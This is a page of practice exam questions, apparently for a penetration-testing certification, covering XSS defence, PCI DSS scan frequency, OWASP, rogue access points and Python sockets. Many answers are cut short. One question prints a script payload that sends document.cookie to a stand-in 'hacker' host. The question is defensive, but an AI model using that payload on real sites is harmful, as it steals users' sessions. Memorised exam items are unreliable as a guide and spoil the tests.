- All Exams Instant Download
Which of the following are the BEST methods to prevent against this type of attack?
autonumGiven the following code: <SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC RIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)A . Web-application firewallB . Parameterized queriesC . Output encodingD . Session tokensE . Input validationF . Base64 encodingView AnswerAnswer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves...
Which of the following would the test discover?
autonumA penetration tester is testing a new API for the company's existing services and is preparing the following script: Which of the following would the test discover?A . Default web configurationsB . Open web ports on a hostC . Supported HTTP methodsD . Listening web servers in a domainView AnswerAnswer:...
autonumCORRECT TEXT
autonumCORRECT TEXT SIMULATION Using the output, identify potential attack vectors that should be further investigated. View AnswerAnswer: 1: Null session enumeration Weak SMB file permissions Fragmentation attack 2: nmap -sV -p 1-1023
Based on the information in the SOW, which of the following behaviors would be considered unethical?
autonumA penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO)...
Which of the following is the MINIMUM frequency to complete the scan of the system?
autonumA penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?A . WeeklyB . MonthlyC . QuarterlyD . AnnuallyView AnswerAnswer: C Explanation: https://www.pcicomplianceguide.org/faq/#25 PCI DSS requires quarterly vulnerability/penetration...
Which of the following steps should the tester take NEXT?
autonumA penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps...
autonumWhich of the following BEST describe the OWASP Top 10? (Choose two.)
autonumWhich of the following BEST describe the OWASP Top 10? (Choose two.)A . The most critical risks of web applicationsB . A list of all the risks of web applicationsC . The risks defined in order of importanceD . A web-application security standardE . A risk-governance and compliance frameworkF ....
Which of the following is the reason for the error?
autonumA penetration tester created the following script to use in an engagement: However, the tester is receiving the following error when trying to run the script: Which of the following is the reason for the error?A . The sys variable was not defined.B . The argv variable was not defined.C...
autonumIn Python socket programming, SOCK_DGRAM type is:
autonumIn Python socket programming, SOCK_DGRAM type is:A . reliable.B . matrixed.C . connectionless.D . slower.View AnswerAnswer: C Explanation: Connectionless due to the Datagram portion mentioned so that would mean its using UDP.
Based on these results, which of the following attacks is MOST likely to succeed?
The following output is from reconnaissance on a public-facing banking website: Based on these results, which of the following attacks is MOST likely to succeed?A . A birthday attack on 64-bit ciphers (Sweet32)B . An attack that breaks RC4 encryptionC . An attack on a session ticket extension (Ticketbleed)D ....
